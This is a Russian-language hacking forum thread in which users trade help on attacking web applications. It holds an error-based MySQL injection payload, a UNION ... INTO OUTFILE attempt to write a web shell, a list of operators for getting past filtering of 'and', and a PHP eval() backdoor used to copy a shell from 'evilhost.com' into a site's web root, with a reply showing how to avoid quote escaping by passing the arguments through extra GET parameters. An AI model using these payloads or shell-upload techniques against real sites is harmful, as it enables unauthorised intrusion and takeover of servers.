Вопросы по уязвимостям

[NameSpace]

Магия HTML5, в нем много исключений и противоречий. <svg> обрабатывается еще одним интерпретатором(парсер тот же, но правила другие), XSS является результатом их общей интерпретации.

Предугадать по одному просмотру кода часто не предоставляется возможным, однако, как видите, возможность обнаружена и используется, все же и не так часто, как атрибут src.

[Stream]

Вот мне интересно, из каких источников я могу подчерпнуть знания, для того, чтобы лучше ориентироваться.
UPD: Нашел статью _interpretor.ru/js_dollar_sign.html, хоть что-то, где с середины немного касается моего вопроса, а именно показывает какие вообще символы могут использоваться в JS, хотя и думаю, что это далеко не вся информация, которую можно подчерпнуть.

[VirusVFV]

Доброе время суток...
Есть вопрос: в mysql инъекции уязвимый параметр проходит через addslashes в php-скрипте. FILE привилегии есть, но вот записать файлы не получается, т.к. выходит нечто вроде этого union select "web shell text...",NULL,NULL INTO OUTFILE \'c:\inteput\wwwroot\shell.php'# т.е. апостроф в имени файла экранируется.
Можно ли как то обойти ?
спс заранее !

[NameSpace]

VirusVFV, в настоящее время сделать это нельзя никак.

[z0mbie]

Имеется такая проблема, есть скуля в Post отправляю

Код:

'and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'

вылазит ошибка:

Код:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select(1)from(select(count(*)),(concat((select(version())),0x00,

убираю кавычки ' , ошибки нет, но и результат не выводит, страница только загружается, на других хостах с теми же cms все работало.

[}{оттабыч]

Цитата:

Сообщение от VirusVFV

Доброе время суток...
Есть вопрос: в mysql инъекции уязвимый параметр проходит через addslashes в php-скрипте. FILE привилегии есть, но вот записать файлы не получается, т.к. выходит нечто вроде этого union select "web shell text...",NULL,NULL INTO OUTFILE \'c:\inteput\wwwroot\shell.php'# т.е. апостроф в имени файла экранируется.
Можно ли как то обойти ?
спс заранее !

В фрагментированной скуле addslashes можно обойти.
https://rdot.org/forum/showthread.php?t=72

[}{оттабыч]

Цитата:

Сообщение от z0mbie

Имеется такая проблема, есть скуля в Post отправляю

Код:

'and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'

вылазит ошибка:

Код:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select(1)from(select(count(*)),(concat((select(version())),0x00,

убираю кавычки ' , ошибки нет, но и результат не выводит, страница только загружается, на других хостах с теми же cms все работало.

Вырезало and судя по ошибке, написано же near 'select(1)

Замените на +, -, =, &, |, &&, ||, <=>, <=, >=, !=, <>, ^, *, <<, >>, <>, %, /, <, > в urlencode или or not, and not, div, xor, or, and, /*!and*/, AnD, импровизируйте.

[NameSpace]

}{оттабыч, этот способ здесь скорее всего не подойдет:

PHP код:

...
    [WHERE where_condition]

    [INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [TERMINATED BY 'string']
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
   ] 


Цитата:

• The WHERE clause, if given, indicates the condition or conditions that rows must satisfy to be selected. where_condition is an expression that evaluates to true for each row to be selected. The statement selects all rows if there is no WHERE clause.
  In the WHERE expression, you can use any of the functions and operators that MySQL supports, except for aggregate (summary) functions. See Section 9.5, “Expression Syntax”, and Chapter 12, Functions and Operators.

https://dev.mysql.com/doc/refman/5.1/en/select.html

В INTO OUTFILE не используются выражения, строка - текст в кавычках.

У автора в распоряжении вероятно только один параметр, если даже и больше, то надо постараться передать сначала текст инъекции вместе с INTO OUTFILE, затем сразу же чистую кавычку(Самый проблемный момент), и сразу же опять свой текст. Сработает это только если после этого вставляется еще одна кавычка, и более ничего.

z0mbie, Посмотрите что вырезается и как не методом догадок, а напрямую :

Код:

a!and

ERROR 1064 (42000): You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for 
the right syntax to use near '!filter' at line 1

Может быть тут просто другая версия CMS. Попробуйте найти новый подход, начните с простых запросов:

Код:

'mod(0%20rlike%200x5B)mod'

ERROR 1139 (42000): Got error 'brackets ([ ]) not balanced' from regexp

[nomad]

На сервере имеется скрипт вида

PHP код:

<?php eval($_GET[a]); ?>

/?a=phpinfo(); - выводится прекрасно (а как же)
/?a=copy('http://evilhost.com/shell.txt','/var/www/site.com/shell.php'); - Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING in ...

/?a=copy("http://evilhost.com/shell.txt","/var/www/site.com/shell.php"); - Parse error: syntax error, unexpected '"', expecting T_STRING in...

Что за хрень? Как обойтись без этих кавычек и почему вообще на них скрипт ругается?



А, решил, вопрос не актуален.

[wget]

Цитата:

Сообщение от nomad

На сервере имеется скрипт вида

PHP код:

<?php eval($_GET[a]); ?>

/?a=phpinfo(); - выводится прекрасно (а как же)
/?a=copy('http://evilhost.com/shell.txt','/var/www/site.com/shell.php'); - Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING in ...

/?a=copy("http://evilhost.com/shell.txt","/var/www/site.com/shell.php"); - Parse error: syntax error, unexpected '"', expecting T_STRING in...

Что за хрень? Как обойтись без этих кавычек и почему вообще на них скрипт ругается?



А, решил, вопрос не актуален.

/?a=copy($_GET[b],$_GET[c]);&b=http://evilhost.com/shell.txt&c=/var/www/site.com/shell.php пробовал?